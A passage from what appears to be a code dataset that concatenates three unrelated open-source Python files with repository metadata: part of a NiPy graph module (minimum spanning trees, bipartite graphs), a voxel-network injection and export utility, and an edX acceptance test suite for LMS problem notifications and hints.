d = self.weights[iw[j]]
while label[a]==label[b]:
j = j+1
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
if label[a]!=label[b]:
la = label[a]
lb = label[b]
label[label==lb] = la
Kedges[2*i,0] = a
Kedges[2*i,1] = b
Kedges[2*i+1,0] = b
Kedges[2*i+1,1] = a
Kweights[2*i] = d
Kweights[2*i+1] = d
K = WeightedGraph(V,Kedges,Kweights)
return K
def Kruskal_dev(self):
"""
Creates the Minimum Spanning Tree self using Kruskal's algo.
efficient is self is sparse
Returns
-------
K: WeightedGraph instance
the resulting MST
Note
----
if self contains several connected components,
self.Kruskal() will also retain a graph with k connected components
"""
k = self.cc().max()+1
E = 2*self.V-2
V = self.V
Kedges = np.zeros((E,2)).astype(np.int)
Kweights = np.zeros(E)
iw = np.argsort(self.weights)
label = np.arange(2*V-1)
j = 0
for i in range(V-k):
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
la = label[a]
lb = label[b]
while la != label[la]: la = label[la]
while lb != label[lb]: lb = label[lb]
while la==lb:
j = j+1
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
la = label[a]
lb = label[b]
while la != label[la]: la = label[la]
while lb != label[lb]: lb = label[lb]
if la!=lb:
label[la] = V+i
label[lb] = V+i
Kedges[2*i,0] = a
Kedges[2*i,1] = b
Kedges[2*i+1,0] = b
Kedges[2*i+1,1] = a
Kweights[2*i] = d
Kweights[2*i+1] = d
K = WeightedGraph(V,Kedges,Kweights)
return K
def Voronoi_diagram(self,seeds,samples):
"""
Defines the graph as the Voronoi diagram (VD)
that links the seeds.
The VD is defined using the sample points.
Parameters
----------
seeds: array of shape (self.V,dim)
samples: array of shape (nsamples,dim)
Note
----
by default, the weights are a Gaussian function of the distance
The implementation is not optimal
"""
# checks
if seeds.shape[0]!=self.V:
raise ValueError,"The numberof seeds is not as expected"
if np.size(seeds) == self.V:
seeds = np.reshape(seeds,(np.size(seeds),1))
if np.size(samples) == samples.shape[0]:
samples = np.reshape(samples,(np.size(samples),1))
if seeds.shape[1]!=samples.shape[1]:
raise ValueError,"The seeds and samples do not belong \
to the same space"
#1. define the graph knn(samples,seeds,2)
i,j,d = graph_cross_knn(samples,seeds,2)
#2. put all the pairs i the target graph
Ns = np.shape(samples)[0]
self.E = Ns
self.edges = np.array([j[2*np.arange(Ns)],j[2*np.arange(Ns)+1]]).T
self.weights = np.ones(self.E)
#3. eliminate the redundancies and set the weights
self.cut_redundancies()
self.symmeterize()
self.set_gaussian(seeds)
def show(self,X=None,figid=-1):
"""
a = self.show(X=None)
plots the current graph in 2D
Parameters
----------
X=None, array of shape (self.V,2)
a set of coordinates that can be used
to embed the vertices in 2D.
if X.shape[1]>2, a svd reduces X for display
By default, the graph is presented on a circle
figid=-1: a figure id for pylab plotting
by default, a new figure is created
Returns
-------
a = figure handle
Note
----
This should be used only for small graphs...
"""
if np.size(self.weights)==0:
fig = Graph.show()
return fig
WM = self.weights.max()
import matplotlib.pylab as mp
if figid >-1:
fig = mp.figure(figid)
else:
fig = mp.figure()
ml = 5.
if (X==None):
for e in range(self.E):
A = (self.edges[e,0]*2*np.pi)/self.V
B = (self.edges[e,1]*2*np.pi)/self.V
C = max(1,int(self.weights[e]*ml/WM))
mp.plot([np.cos(A),np.cos(B)],[np.sin(A),np.sin(B)],'k',
linewidth=C)
t = (2*np.pi*np.arange(self.V))/self.V
mp.plot(np.cos(t),np.sin(t),'o',linewidth=ml)
mp.axis([-1.1,1.1,-1.1,1.1])
return fig
if (X.shape[0]!=self.V):
raise ValueError,'X.shape(0)!=self.V'
if np.size(X)==self.V:
X = np.reshape(X,(self.V,1))
if X.shape[1]==1:
# plot the graph on a circle
x = np.pi*(X-X.min())/(X.max()-X.min())
for e in range(self.E):
A = x[self.edges[e,0]]
B = x[self.edges[e,1]]
C = max(1,int(self.weights[e]*ml/WM))
mp.plot([np.cos(A),np.cos(B)],[np.sin(A),np.sin(B)],
'k',linewidth=C)
mp.plot(np.cos(x),np.sin(x),'o',linewidth=ml)
mp.axis([-1.1,1.1,-0.1,1.1])
if X.shape[1]>2:
Y = X.copy()
import numpy.linalg as L
M1,M2,M3 = L.svd(Y,0)
Y = np.dot(M1,np.diag(M2))
Y = Y[:,:1]
if X.shape[1]<3:
Y = X
if Y.shape[1]==2:
for e in range(self.E):
A = self.edges[e,0]
B = self.edges[e,1]
C = max(1,int(self.weights[e]*ml/WM))
mp.plot([Y[A,0],Y[B,0]],[Y[A,1],Y[B,1]],'k',linewidth=C)
mp.plot(Y[:,0],Y[:,1],'o',linewidth=ml)
xmin = Y[:,0].min()
ymin = Y[:,1].min()
xmax = Y[:,0].max()
ymax = Y[:,1].max()
xmin = 1.1*xmin-0.1*xmax
xmax = 1.1*xmax-0.1*xmin
ymin = 1.1*ymin-0.1*ymax
ymax = 1.1*ymax-0.1*ymin
mp.axis([xmin,xmax,ymin,ymax])
mp.show()
return fig
def converse_edge(self):
"""
Returns the index of the edge (j,i) for each edge (i,j)
Note: a C implementation might be necessary
"""
ci,ne,we = self.to_neighb()
li = self.left_incidence()
ri = self.right_incidence()
tag = -np.ones(self.E,np.int)
for v in range(self.V):
# e = (vw)
for e in li[v]:
w = self.edges[e,1]
# c=(wv)
liw = np.array(li[w])
c = liw[self.edges[li[w],1]==v]
tag[e]=c
return tag
def remove_edges(self,valid):
"""
Removes all the edges for which valid==0
Parameters
----------
valid, an array of shape (self.E)
"""
if np.size(valid)!=self.E:
raise ValueError, "the input vector does not have the correct size"
valid = np.reshape(valid,np.size(valid))
self.E = int(valid.sum())
self.edges = self.edges[valid!=0,:]
self.weights = self.weights[valid!=0]
def list_of_neighbors(self):
"""
returns the set of neighbors of self as a list of arrays
"""
ci,ne,we = self.to_neighb()
ln = [[ne[ci[i]:ci[i+1]]] for i in range(self.V)]
return ln
def copy(self):
"""
returns a copy of self
"""
G = WeightedGraph(self.V,self.edges.copy(),self.weights.copy())
return G
def skeleton(self):
"""
returns a MST that based on self.weights
Note: self must be connected
"""
# check that self is connected
u = self.cc()
if u.max()>0:
raise ValueError, "cannot create the skeleton for \
unconnected graphs"
i,j,d = graph_skeleton(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
E = np.size(i)
edges = np.zeros((E,2),np.int)
edges[:,0] = i
edges[:,1] = j
weights = np.array(d)
G = WeightedGraph(self.V,edges,weights)
return G
def left_incidence(self):
"""
Returns
-------
the left incidence matrix of self
as a list of lists:
i.e. the list[[e.0.0,..,e.0.i(0)],..,[e.V.0,E.V.i(V)]]
where e.i.j is the set of edge indexes so that
e.i.j[0] = i
"""
linc = []
for i in range(self.V):
linc.append([])
for e in range(self.E):
i = self.edges[e,0]
a = linc[i]
a.append(e)
return linc
def right_incidence(self):
"""
Returns
-------
the right incidence matrix of self
as a list of lists:
i.e. the list[[e.0.0,..,e.0.i(0)],..,[e.V.0,E.V.i(V)]]
where e.i.j is the set of edge indexes so that
e.i.j[1] = i
"""
rinc = []
for i in range(self.V):
rinc.append([])
for e in range(self.E):
i = self.edges[e,1]
a = rinc[i]
a.append(e)
return rinc
def is_connected(self):
"""
States whether self is connected or not
"""
if self.V<1:
raise ValueError, "empty graph"
if self.V<2:
return True
if self.E==0:
return False
b = graph_is_connected(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
if b==-1:
raise ValueError, "problem in the c function"
return int(b)
def WeightedDegree(self,c):
"""
returns the sum of weighted degree of graph self
Parameters
----------
c (int): side selection
if c==0 considering left side
if c==1 considering right side of the edges
Returns
-------
wd : array of shape (self.V),
the resulting weighted degree
Note: slow implementation
"""
if c==0:
mlist = self.left_incidence()
else:
mlist = self.right_incidence()
w = self.get_weights()
wd = [np.sum(w[n]) for n in mlist]
wd = np.array(wd)
return wd
class BipartiteGraph(WeightedGraph):
"""
This is a bipartite graph structure, i.e.
a graph there are two types of nodes, such that
edges can exist only between nodes of type 1 and type 2
(not within)
fields of this class:
V (int,>0) the number of type 1 vertices
W (int,>0) the number of type 2 vertices
E : (int) the number of edges
edges: array of shape (self.E,2) reprensenting pairwise neighbors
weights, array of shape (self.E), +1/-1 for scending/descending links
"""
def __init__(self, V,W, edges=None, weights=None):
"""
Parameters
----------
V (int), the number of vertices of subset 1
W (int), the number of vertices of subset 2
edges=None: array of shape (self.E,2)
the edge array of the graph
weights=None: array of shape (self.E)
the asociated weights array
"""
V = int(V)
W = int(W)
if (V<1) or (W<1):
raise ValueError, 'cannot create graph with no vertex'
self.V = V
self.W = W
self.E = 0
if (edges==None)&(weights==None):
self.edges = np.array([],np.int)
self.weights = np.array([])
else:
if edges.shape[0]==np.size(weights):
E = edges.shape[0]
self.E = E
self.edges = -np.ones((E,2),np.int)
self.set_edges(edges)
#print np.shape(weights),self.E
WeightedGraph.set_weights(self,weights)
else:
raise ValueError, 'Incompatible size of the edges and \
weights matrices'
def set_edges(self,edges):
"""
sets self.edges=edges if
1. edges has a correct size
2. edges take values in [0..V-1]*[0..W-1]
Parameters
----------
edges: array of shape(self.E,2): set of candidate edges
"""
if np.shape(edges)!=np.shape(self.edges):
raise ValueError, 'Incompatible size of the edge matrix'
if np.size(edges)>0:
if edges.max(0)[0]+1>self.V:
raise ValueError, 'Incorrect edge specification'
if edges.max(0)[1]+1>self.W:
raise ValueError, 'Incorrect edge specification'
self.edges = edges
def check_feature_matrices(self,X,Y):
"""
checks wether the dismension of X and Y is coherent with self
and possibly reshape it
Parameters
----------
X,Y arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = common dimension of the features
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if np.size(Y)==Y.shape[0]:
Y = np.reshape(Y,(np.size(Y),1))
if X.shape[1]!=Y.shape[1]:
raise ValueError, 'X.shape[1] should = Y.shape[1]'
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0]!=self.V'
if Y.shape[0]!=self.W:
raise ValueError, 'Y.shape[0]!=self.W'
def copy(self):
"""
returns a copy of self
"""
G = BipartiteGraph(self.V,self.W,self.edges.copy(),
self.weights.copy())
return G
def cross_eps(self,X,Y,eps=1.):
"""
set the graph to be the eps-neighbours graph of from X to Y
Parameters
----------
X,Y arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = common dimension of the features
eps=1, float : the neighbourhood size considered
Returns
-------
self.E (int) the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded
in a (locally) Euclidian space
for the sake of speed it is advisable to give PCA-preprocessed
matrices X and Y.
"""
self.check_feature_matrices(X,Y)
try:
eps = float(eps)
except:
"eps cannot be cast to a float"
if np.isnan(eps):
raise ValueError, 'eps is nan'
if np.isinf(eps):
raise ValueError, 'eps is inf'
i,j,d = graph_cross_eps(X,Y,eps)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def cross_eps_robust(self,X,Y,eps=1.):
"""
Set the graph to be the eps-neighbours graph of from X to Y
this procedure is robust in the sense that for each row of X
at least one matching row Y is found, even though the distance
is greater than eps.
Parameters
----------
X,Y: arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = dimension of the features
eps=1, float, the neighbourhood size considered
Returns
-------
self.E (int) the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidian space
for the sake of speed it is advisable to give
PCA-preprocessed matrices X and Y.
"""
self.check_feature_matrices(X,Y)
try:
eps = float(eps)
except:
"eps cannot be cast to a float"
if np.isnan(eps):
raise ValueError, 'eps is nan'
if np.isinf(eps):
raise ValueError, 'eps is inf'
i,j,d = graph_cross_eps_robust(X,Y,eps)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def cross_knn(self,X,Y,k=1):
"""
set the graph to be the k-nearest-neighbours graph of from X to Y
Parameters
----------
X,Y arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = dimension of the features
k=1, int is the number of neighbours considered
Returns
-------
self.E, int the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidian space
for the sake of speed it is advisable to give
PCA-preprocessed matrices X and Y.
"""
self.check_feature_matrices(X,Y)
try:
k=int(k)
except :
"k cannot be cast to an int"
if np.isnan(k):
raise ValueError, 'k is nan'
if np.isinf(k):
raise ValueError, 'k is inf'
i,j,d = graph_cross_knn(X,Y,k)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def concatenate_graphs(G1,G2):
"""
Sets G as the concatenation of the graphs G1 and G2
It is thus assumed that the vertices of G1 and G2 are disjoint sets
Parameters
----------
G1,G2: the two WeightedGraph instances to be concatenated
Returns
-------
G, WeightedGraph, the concatenated graph
Note
----
this implies that the vertices of G corresponding to G2
are labeled [G1.V .. G1.V+G2.V]
"""
V = G1.V+G2.V
edges = np.vstack((G1.edges,G1.V+G2.edges))
weights = np.hstack((G1.weights,G2.weights))
G = WeightedGraph(V,edges,weights)
return G
|
yarikoptic/NiPy-OLD
|
nipy/neurospin/graph/graph.py
|
Python
|
bsd-3-clause
| 44,792
|
[
"Gaussian"
] |
80bfb2570da31ca771363d22a28e4ab3f245e22bf28ba61f7a25ba3c540f06a6
|
import numpy as np
from IPython import embed
def coords2str(x):
return " ".join(("%d" % n for n in x))
def str2coords(s):
return np.fromstring(s, dtype=int, sep=" ")
def index_lookup_map(x):
return {coords2str(x): i for i,x in enumerate(x)}
def bounding_box(voxels):
mins=np.min(voxels,axis=0)
maxs=np.max(voxels,axis=0)
return (mins,maxs)
def centroid_of_region_2d(label_grid,region):
y,x=np.where(label_grid==region)
return (np.mean(x),np.mean(y))
def gaussian_injection(center,radius):
from scipy.ndimage.filters import gaussian_filter
n=radius*2+1
nhalf=radius
data=np.zeros([n,n,n])
data[nhalf,nhalf,nhalf]=1.0
filt=gaussian_filter(data,radius/3.0,mode='constant',cval=0.0,truncate=3.0)
filt=filt/np.sum(filt)
vox_filt={}
for index, v in np.ndenumerate(filt):
voxel=np.array(center+index-[nhalf,nhalf,nhalf],dtype=int)
key=coords2str(voxel)
vox_filt[key]=v
return vox_filt
def point_injection(center):
key=coords2str(center)
vox_filt={}
vox_filt[key]=1.0
return vox_filt
def build_injection_vectors(voxel_coords,coord_vox_map,
region_ids,inj_site_id,radius,stride):
'''
Tiles the injection site with virtual injections of a given radius.
Generates the virtual injections.
Parameters
----------
voxel_coords : ndarray (N x 3)
Coordinates x,y,z of each voxel
coord_vox_map : dict
Keys are coords2str([x,y,z]), values give index of that voxel
region_ids : ndarray (N x 1)
Regions assigned to each voxel
inj_site_id : int
Id of region to target
radius : int
Radius of each injection (units: voxels)
stride : int
How many voxels to stride when placing centers
Returns
-------
Xvirt : ndarray (N x num_inj)
Array representing the virtual injections
inj_center : ndarray (3 x num_inj)
Centers of the virtual injections
'''
index_in_source=(region_ids==inj_site_id)
min_bnd, max_bnd=bounding_box(voxel_coords[np.where(index_in_source)[0],])
N=voxel_coords.shape[0]
num_est=int(np.round(np.prod(max_bnd-min_bnd)/radius**3.0))
num=0
Xvirt=np.zeros((N,num_est))
inj_center=np.zeros((3,num_est))
# y changes slowest since it is approximately depth
for y in np.arange(min_bnd[1],max_bnd[1],stride,dtype=np.int):
for z in np.arange(min_bnd[2],max_bnd[2],stride,dtype=np.int):
for x in np.arange(min_bnd[0],max_bnd[0],stride,dtype=np.int):
this_center=np.array([x,y,z],dtype=int)
#this_inj=gaussian_injection(this_center,radius)
this_inj=point_injection(this_center)
these_vox=this_inj.keys()
keep_this=True
for v in these_vox:
try:
index=coord_vox_map[v]
if not index_in_source[index]:
keep_this=False
break
except KeyError:
keep_this=False
break
if keep_this:
for v in these_vox:
index=coord_vox_map[v]
Xvirt[index,num]=this_inj[v]
inj_center[:,num]=this_center
num+=1
Xvirt=Xvirt[:,0:num]
inj_center=inj_center[:,0:num]
return Xvirt,inj_center
def map_to_regular_grid(x, voxel_coords, bbox=None):
'''
Map a voxel vector into a regular grid in the bounding box.
Parameters
----------
x : ndarray (N x 1 or N x 2)
voxel_coords : ndarray (N x 3)
bbox : list, default = None
Length 3 list of bounding box coords to map into
Returns
-------
Y
'''
## check input
if bbox is not None:
assert type(bbox) is list, \
"bbox should be list"
assert len(bbox) == 3, \
"bbox length should be 3"
assert voxel_coords.shape[0] == x.shape[0], \
"x and voxel_coords should have same first dimension"
assert voxel_coords.shape[1] == 3,\
"voxel_coords should be (N x 3)"
## compute bounding box if necessary
if bbox is None:
min_box, max_box = bounding_box(voxel_coords)
bbox = shape_regular_grid(voxel_coords)
else:
min_box = [0, 0, 0]
max_box = bbox
if x.ndim == 2:
# assume 2nd dim holds multiple vectors
num_virt = x.shape[1]
Y = np.zeros(list(bbox).append(num_virt))
for inj in range(num_virt):
Y[:,:,:,inj] = map_to_regular_grid(x[:,inj], voxel_coords, bbox)
elif x.ndim == 1:
Y = np.zeros(bbox)
for index, value in enumerate(x):
new_index = (voxel_coords[index] - min_box).astype(int)
Y[new_index[0],new_index[1],new_index[2]] = value
else:
raise Exception('can only map 1 or 2 dimensional arrays to a grid')
return(Y)
def shape_regular_grid(voxel_coords):
min_box, max_box = bounding_box(voxel_coords)
dims = max_box - min_box+1
return dims
def save_as_csv(fn,Xvirt_grid,Yvirt_grid,
voxel_coords_source,
voxel_coords_target):
'''
Save 4d arrays in CSV
Parameters
----------
fn : string
Filename
Xvirt_grid : ndarray
4d array of injections aligned to grid
Yvirt_grid : ndarray
4d array of projections aligned to grid
voxel_coords_source : ndarray
num_voxel x 3 array of x,y,z coordinates
voxel_coords_target : ndarray
num_voxel x 3 array of x,y,z coordinates
'''
assert np.all(voxel_coords_source==voxel_coords_target),\
"source and target voxel coordinates should be equal"
assert Xvirt_grid.shape == Yvirt_grid.shape,\
"Xvirt_grid and Yvirt_grid should have same shape"
if Xvirt_grid.ndim == 4:
grid_shape=Xvirt_grid[:,:,:,0].shape
num_rows=np.prod(grid_shape)
num_virt=Xvirt_grid.shape[3]
else:
raise Exception("need 4d arrays for Xvirt_grid, Yvirt_grid")
num_cols=3+2*num_virt
csv_data=np.zeros((np.prod(Xvirt_grid[:,:,:,0].shape),num_cols))
base_pt=np.min(voxel_coords_source,axis=0)
row=0
for index in np.ndindex(grid_shape):
x,y,z=base_pt+np.array(index)
row_data=np.hstack((x,y,z,Xvirt_grid[index],Yvirt_grid[index]))
csv_data[row,:]=row_data
#print x,y,z
row+=1
header="X coord,Y coord,Z coord,"+\
','.join(["X%04d" % n for n in range(num_virt)])+','+\
','.join(["Y%04d" % n for n in range(num_virt)])
np.savetxt(fn,csv_data,delimiter=',',header=header,comments='')
def save_as_vtk(fn,X_grid,
voxel_coords):
'''
Save 4d arrays in VTK
Parameters
----------
fn : string
Filename
X_grid : ndarray
4d array of injections aligned to grid
voxel_coords : ndarray
num_voxel x 3 array of x,y,z coordinates
'''
from tvtk.api import tvtk, write_data
if X_grid.ndim == 4:
grid_shape=X_grid[:,:,:,0].shape
num_rows=np.prod(grid_shape)
num_virt=X_grid.shape[3]
else:
raise Exception("need 4d arrays for X_grid")
VTK=tvtk.ImageData(spacing=(1,1,1),
origin=np.min(voxel_coords,axis=0),
dimensions=grid_shape)
VTK.point_data.scalars= np.arange(0,num_rows)
VTK.point_data.scalars.name='voxel number'
for n in range(num_virt):
a=VTK.point_data.add_array(X_grid[:,:,:,n].ravel(order='F'))
VTK.point_data.get_array(a).name="X%04d" % n
VTK.point_data.update()
del a
write_data(VTK,fn)
def save_as_vtk_old(fn,Xvirt_grid,Yvirt_grid,
voxel_coords_source,
voxel_coords_target):
'''
Save 4d arrays in VTK
Parameters
----------
fn : string
Filename
Xvirt_grid : ndarray
4d array of injections aligned to grid
Yvirt_grid : ndarray
4d array of projections aligned to grid
voxel_coords_source : ndarray
num_voxel x 3 array of x,y,z coordinates
voxel_coords_target : ndarray
num_voxel x 3 array of x,y,z coordinates
'''
from tvtk.api import tvtk, write_data
assert np.all(voxel_coords_source==voxel_coords_target),\
"source and target voxel coordinates should be equal"
assert Xvirt_grid.shape == Yvirt_grid.shape,\
"Xvirt_grid and Yvirt_grid should have same shape"
if Xvirt_grid.ndim == 4:
grid_shape=Xvirt_grid[:,:,:,0].shape
num_rows=np.prod(grid_shape)
num_virt=Xvirt_grid.shape[3]
else:
raise Exception("need 4d arrays for Xvirt_grid, Yvirt_grid")
VTK=tvtk.ImageData(spacing=(1,1,1),
origin=np.min(voxel_coords_source,axis=0),
dimensions=grid_shape)
VTK.point_data.scalars= np.arange(0,num_rows)
VTK.point_data.scalars.name='voxel number'
#arr_num=1
for n in range(num_virt):
a=VTK.point_data.add_array(Xvirt_grid[:,:,:,n].ravel(order='F'))
VTK.point_data.get_array(a).name="%04d_Inj_#%d" % (2*n, n)
VTK.point_data.update()
del a
#arr_num+=1
a=VTK.point_data.add_array(Yvirt_grid[:,:,:,n].ravel(order='F'))
VTK.point_data.get_array(a).name="%04d_Proj_#%d" % (2*n+1, n)
VTK.point_data.update()
del a
#arr_num+=1
write_data(VTK,fn)
|
kharris/allen-voxel-network
|
voxnet/plotting.py
|
Python
|
bsd-2-clause
| 9,519
|
[
"VTK"
] |
cf372d8f905e57317508791af8e03afe1a401fbd417208e2f498e435efe252b1
|
# -*- coding: utf-8 -*-
"""
Bok choy acceptance tests for problems in the LMS
See also old lettuce tests in lms/djangoapps/courseware/features/problems.feature
"""
from nose.plugins.attrib import attr
from textwrap import dedent
from common.test.acceptance.tests.helpers import UniqueCourseTest
from common.test.acceptance.pages.studio.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.courseware import CoursewarePage
from common.test.acceptance.pages.lms.problem import ProblemPage
from common.test.acceptance.pages.lms.login_and_register import CombinedLoginAndRegisterPage
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.tests.helpers import EventsTestMixin
class ProblemsTest(UniqueCourseTest):
"""
Base class for tests of problems in the LMS.
"""
def setUp(self):
super(ProblemsTest, self).setUp()
self.username = "test_student_{uuid}".format(uuid=self.unique_id[0:8])
self.email = "{username}@example.com".format(username=self.username)
self.password = "keep it secret; keep it safe."
self.xqueue_grade_response = None
self.courseware_page = CoursewarePage(self.browser, self.course_id)
# Install a course with a hierarchy and problems
course_fixture = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
problem = self.get_problem()
sequential = self.get_sequential()
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
sequential.add_children(problem)
)
).install()
# Auto-auth register for the course.
AutoAuthPage(
self.browser,
username=self.username,
email=self.email,
password=self.password,
course_id=self.course_id,
staff=True
).visit()
def get_problem(self):
""" Subclasses should override this to complete the fixture """
raise NotImplementedError()
def get_sequential(self):
""" Subclasses can override this to add a sequential with metadata """
return XBlockFixtureDesc('sequential', 'Test Subsection')
class ProblemClarificationTest(ProblemsTest):
"""
Tests the <clarification> element that can be used in problem XML.
"""
def get_problem(self):
"""
Create a problem with a <clarification>
"""
xml = dedent("""
<problem markdown="null">
<text>
<p>
Given the data in Table 7 <clarification>Table 7: "Example PV Installation Costs",
Page 171 of Roberts textbook</clarification>, compute the ROI
<clarification>Return on Investment <strong>(per year)</strong></clarification> over 20 years.
</p>
<numericalresponse answer="6.5">
<label>Enter the annual ROI</label>
<textline trailing_text="%" />
</numericalresponse>
</text>
</problem>
""")
return XBlockFixtureDesc('problem', 'TOOLTIP TEST PROBLEM', data=xml)
def test_clarification(self):
"""
Test that we can see the <clarification> tooltips.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TOOLTIP TEST PROBLEM')
problem_page.click_clarification(0)
self.assertIn('"Example PV Installation Costs"', problem_page.visible_tooltip_text)
problem_page.click_clarification(1)
tooltip_text = problem_page.visible_tooltip_text
self.assertIn('Return on Investment', tooltip_text)
self.assertIn('per year', tooltip_text)
self.assertNotIn('strong', tooltip_text)
class ProblemHintTest(ProblemsTest, EventsTestMixin):
"""
Base test class for problem hint tests.
"""
def verify_check_hint(self, answer, answer_text, expected_events):
"""
Verify clicking Check shows the extended hint in the problem message.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_text[0], u'question text')
problem_page.fill_answer(answer)
problem_page.click_submit()
self.assertEqual(problem_page.message_text, answer_text)
# Check for corresponding tracking event
actual_events = self.wait_for_events(
event_filter={'event_type': 'edx.problem.hint.feedback_displayed'},
number_of_matches=1
)
self.assert_events_match(expected_events, actual_events)
def verify_demand_hints(self, first_hint, second_hint, expected_events):
"""
Test clicking through the demand hints and verify the events sent.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# The hint notification should not be visible on load
self.assertFalse(problem_page.is_hint_notification_visible())
# The two Hint button should be enabled. One visible, one present, but not visible in the DOM
self.assertEqual([None, None], problem_page.get_hint_button_disabled_attr())
# The hint button rotates through multiple hints
problem_page.click_hint()
self.assertTrue(problem_page.is_hint_notification_visible())
self.assertEqual(problem_page.hint_text, first_hint)
# Now there are two "hint" buttons, as there is also one in the hint notification.
self.assertEqual([None, None], problem_page.get_hint_button_disabled_attr())
problem_page.click_hint()
self.assertEqual(problem_page.hint_text, second_hint)
# Now both "hint" buttons should be disabled, as there are no more hints.
self.assertEqual(['true', 'true'], problem_page.get_hint_button_disabled_attr())
# Now click on "Review" and make sure the focus goes to the correct place.
problem_page.click_review_in_notification(notification_type='hint')
problem_page.wait_for_focus_on_problem_meta()
# Check corresponding tracking events
actual_events = self.wait_for_events(
event_filter={'event_type': 'edx.problem.hint.demandhint_displayed'},
number_of_matches=2
)
self.assert_events_match(expected_events, actual_events)
def get_problem(self):
""" Subclasses should override this to complete the fixture """
raise NotImplementedError()
class ProblemNotificationTests(ProblemsTest):
"""
Tests that the notifications are visible when expected.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 10},
grader_type='Final Exam')
def test_notification_updates(self):
"""
Verifies that the notification is removed and not visible when it should be
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
problem_page.click_choice("choice_2")
self.assertFalse(problem_page.is_success_notification_visible())
problem_page.click_submit()
problem_page.wait_success_notification()
self.assertEqual('Question 1: correct', problem_page.status_sr_text)
# Clicking Save should clear the submit notification
problem_page.click_save()
self.assertFalse(problem_page.is_success_notification_visible())
problem_page.wait_for_save_notification()
# Changing the answer should clear the save notification
problem_page.click_choice("choice_1")
self.assertFalse(problem_page.is_save_notification_visible())
problem_page.click_save()
problem_page.wait_for_save_notification()
# Submitting the problem again should clear the save notification
problem_page.click_submit()
problem_page.wait_incorrect_notification()
self.assertEqual('Question 1: incorrect', problem_page.status_sr_text)
self.assertFalse(problem_page.is_save_notification_visible())
class ProblemFeedbackNotificationTests(ProblemsTest):
"""
Tests that the feedback notifications are visible when expected.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 10},
grader_type='Final Exam')
def test_feedback_notification_hides_after_save(self):
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
problem_page.click_choice("choice_0")
problem_page.click_submit()
problem_page.wait_for_feedback_message_visibility()
problem_page.click_choice("choice_1")
problem_page.click_save()
self.assertFalse(problem_page.is_feedback_message_notification_visible())
class ProblemSaveStatusUpdateTests(ProblemsTest):
"""
Tests the problem status updates correctly with an answer change and save.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 10},
grader_type='Final Exam')
def test_status_removed_after_save_before_submit(self):
"""
Scenario: User should see the status removed when saving after submitting an answer and reloading the page.
Given that I have loaded the problem page
And a choice has been selected and submitted
When I change the choice
And Save the problem
And reload the problem page
Then I should see the save notification and I should not see any indication of problem status
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
problem_page.click_choice("choice_1")
problem_page.click_submit()
problem_page.wait_incorrect_notification()
problem_page.wait_for_expected_status('label.choicegroup_incorrect', 'incorrect')
problem_page.click_choice("choice_2")
self.assertFalse(problem_page.is_expected_status_visible('label.choicegroup_incorrect'))
problem_page.click_save()
problem_page.wait_for_save_notification()
# Refresh the page and the status should not be added
self.courseware_page.visit()
